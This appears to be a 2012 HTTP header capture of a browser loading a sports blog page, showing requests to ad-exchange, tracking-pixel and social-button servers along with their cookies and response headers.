User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1
Cookie: uid=5764607523038943412
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.0.15
Date: Sun, 18 Nov 2012 01:30:48 GMT
Last-Modified: Thu, 15 Nov 2012 12:48:13 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT&quot;
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=604800
Accept-Ranges: none
Content-Encoding: gzip
GET /c/cse?a=Q&B=11 HTTP/1.1

Host: connexity.net
GET /c/cse?a=Q&amp;B=11 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: text/html
Server: Connexity
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 18 Nov 2012 01:30:48 GMT
Cache-Control: no-store, max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Encoding: gzip
GET /bh/rtset?do=add&pid=543604&ev=4256222330766245957 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=543604&amp;ev=4256222330766245957 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-119-17-88
Date: Sun, 18 Nov 2012 01:30:47 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:48 GMT; Path=/ pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604.4256222330766245957.0.0.1353202248197|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:48 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /_/+1/fastbutton?bsv&size=medium&hl=en-US&origin=http%3A%2F%2Ffenwaywest.com&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 18 Nov 2012 01:30:48 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /fr/u.php?p=391363987594223&m=5858721859426781856 HTTP/1.1

Host: www.facebook.com
GET /fr/u.php?p=391363987594223&amp;m=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: public, max-age=0
Date: Sat, 17 Nov 2012 17:30:48 PST
Expires: Sat, 17 Nov 2012 17:30:48 PST
Pragma: public
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
X-FB-Debug: H/Hx8lunKENDXoOq7XIb0rBuuEw6afFmc8264O3rcQM=
Transfer-Encoding: chunked
Connection: keep-alive
GET /Banners/1840837/1840837.swf?bv=1-28 HTTP/1.1

Host: s1.adformdsp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1
Cookie: uid=5764607523038943412
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: nginx/1.0.15
Date: Sun, 18 Nov 2012 01:30:48 GMT
Content-Length: 51192
Last-Modified: Thu, 01 Nov 2012 09:06:40 GMT
Connection: close
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT&quot;
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=3600
GET /bh/rtset?do=add&pid=547259&ev=CAESEKYS_yt-_5f3x4i1G1qPWZQ&google_cver=1 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=547259&amp;ev=CAESEKYS_yt-_5f3x4i1G1qPWZQ&amp;google_cver=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-59-195
Date: Sun, 18 Nov 2012 01:30:47 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:48 GMT; Path=/ pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259.CAESEKYS_yt-_5f3x4i1G1qPWZQ.0.0.1353202248373; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:48 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /bh/rtset?do=add&pid=535393&ev=50a83a45a735dc4b5be8a818 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=535393&amp;ev=50a83a45a735dc4b5be8a818 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-39-63-138
Date: Sun, 18 Nov 2012 01:30:47 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:48 GMT; Path=/ pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393.50a83a45a735dc4b5be8a818.0.0.1353202248368|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:48 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET ///www/delivery/ajs.php?zoneid=95028&username=bloguin&numAds=1&premium=1&eleid=lijit_region_95028&abf=true&tid=95028_1353202247953a384128fa26e&lijit_kw=&cb=93117615846&flv=10.0.45&time=02:30:47&ifr=1&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&od=fenwaywest.com&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: apr.lijit.com
GET ///www/delivery/ajs.php?zoneid=95028&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95028&amp;abf=true&amp;tid=95028_1353202247953a384128fa26e&amp;lijit_kw=&amp;cb=93117615846&amp;flv=10.0.45&amp;time=02:30:47&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwNybENACEMA8BdXH9BTBIbVkPs%2FnQn3UFgY8pOpimRs4dX4UPwVbkshmslW35o3B8vKwsl
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 18 Nov 2012 01:30:48 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; expires=Mon, 18-Nov-2013 01:30:48 GMT; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1224
Connection: close
GET /_/apps-static/_/ss/plusone/ver=-2s34bnfkbf73/am=!So38XEcoO7WFfKjFAQ/bf=wg/r=O/rs=AItRSTPsco_MUWQCxfRu8MH39i9U8zgJlQ HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/css; charset=UTF-8
Etag: &quot;-456967259&quot;
Expires: Mon, 17 Dec 2012 01:01:41 GMT
Date: Sat, 17 Nov 2012 01:01:41 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 3138
Age: 88147
GET /Banners/scripts/assets/flash/assert.swf?bv=1-28 HTTP/1.1

Host: files.adform.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1
Cookie: uid=5764607523038943412
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Sun, 18 Nov 2012 01:30:48 GMT
Server: PWS/8.0.9.6
X-Px: ht h0-s27.p1-arn.cdngp.net
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT&quot;
Cache-Control: max-age=604800
Expires: Sun, 18 Nov 2012 12:34:49 GMT
Age: 564959
Content-Length: 774
Last-Modified: Tue, 06 Nov 2012 15:50:02 GMT
Connection: keep-alive
GET /_/+1/fastbutton?bsv&size=medium&hl=en-US&origin=http%3A%2F%2Ffenwaywest.com&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Ffenwaywest.com&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DZmauHrJi-hM.no.%2Fsv%3D1%2Fam%3D!lVF6vhgpQzaIV3w7gg%2Fd%3D1%2Frs%3DAItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
